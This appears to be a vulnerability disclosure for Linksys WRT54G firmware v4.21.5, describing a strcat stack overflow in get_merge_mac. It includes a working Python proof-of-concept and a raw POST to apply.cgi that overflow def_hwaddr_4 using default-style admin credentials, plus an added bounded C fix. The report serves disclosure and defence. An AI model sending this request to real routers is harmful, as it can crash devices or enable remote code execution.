Product overview https://store.linksys.com/support-product?sku=WRT54G
Linksys WRT54G Firmware v4.21.5
Linksys WRT54G firmware v4.21.5 has a stack-based buffer overflow in the get_merge_mac function. The def_hwaddr_%d variables receive their values from the parameters of a POST request.
In line 17, the strcat function merges each value into the variable a2. Note that a2 is stack-allocated in the calling function and has a size of only 24 characters. If the merged input exceeds this length, the buffer overflows, potentially leading to remote code execution or denial-of-service attacks.
import requests
url = 'http://192.168.1.1/apply.cgi'
headers = {
    'Host': '192.168.1.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://192.168.1.1',
    'Authorization': 'Basic OmFkbWlu',
    'Connection': 'close',
    'Referer': 'http://192.168.1.1/WanMAC.asp',
    'Upgrade-Insecure-Requests': '1',
    'Priority': 'u=1',
}
payload = ('submit_button=WanMAC&change_action=&submit_type=&action=Apply&mac_clone_enable=1&def_hwaddr=6&'
'def_hwaddr_0=1C&def_hwaddr_1=0F&def_hwaddr_2=66&def_hwaddr_3=0A&'
'def_hwaddr_4=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&'
'def_hwaddr_5=E3')
response = requests.post(url, headers=headers, data=payload)
print('Status:', response.status_code)
print('Response:', response.text)
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Origin: http://192.168.1.1
Authorization: Basic OmFkbWlu
Connection: close
Referer: http://192.168.1.1/WanMAC.asp
Upgrade-Insecure-Requests: 1
Priority: u=1

submit_button=WanMAC&change_action=&submit_type=&action=Apply&mac_clone_enable=1&def_hwaddr=6&def_hwaddr_0=1C&def_hwaddr_1=0F&def_hwaddr_2=66&def_hwaddr_3=0A&def_hwaddr_4=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&def_hwaddr_5=E3
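A bounded version of the merge described above, as an added example that is neither the firmware's code nor part of the original report: it assumes the six def_hwaddr_%d values have already been read from the request, accepts each only if it is exactly two hex digits, and only then writes into the caller's buffer. The names merge_mac_checked and is_hex_octet and the colon-separated output format are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define MAC_OCTETS  6
#define MAC_STR_LEN 18  /* "XX:XX:XX:XX:XX:XX" + NUL, fits a 24-byte buffer */

/* Returns 1 only if s is exactly two hexadecimal digits. */
static int is_hex_octet(const char *s)
{
    return s != NULL && isxdigit((unsigned char)s[0]) &&
           isxdigit((unsigned char)s[1]) && s[2] == '\0';
}

/*
 * Hypothetical bounded replacement for a strcat-based merge (names and
 * output format are assumptions). octets[i] is the request value of
 * def_hwaddr_<i>. Returns 0 and fills out on success; returns -1 and
 * leaves out empty if any field is malformed or out is too small.
 */
int merge_mac_checked(const char *const octets[MAC_OCTETS],
                      char *out, size_t out_len)
{
    size_t used = 0;

    if (out == NULL || out_len == 0)
        return -1;
    out[0] = '\0';
    if (octets == NULL || out_len < MAC_STR_LEN)
        return -1;

    /* Validate every field before writing anything. */
    for (int i = 0; i < MAC_OCTETS; i++)
        if (!is_hex_octet(octets[i]))
            return -1;

    /* Each field is now known to be 2 bytes, so the total is 17 + NUL. */
    for (int i = 0; i < MAC_OCTETS; i++) {
        if (i > 0)
            out[used++] = ':';
        out[used++] = (char)toupper((unsigned char)octets[i][0]);
        out[used++] = (char)toupper((unsigned char)octets[i][1]);
    }
    out[used] = '\0';
    return 0;
}
```

The length is checked per field, before any copy, so an oversized def_hwaddr_4 like the one in the request above is rejected without touching the 24-byte buffer.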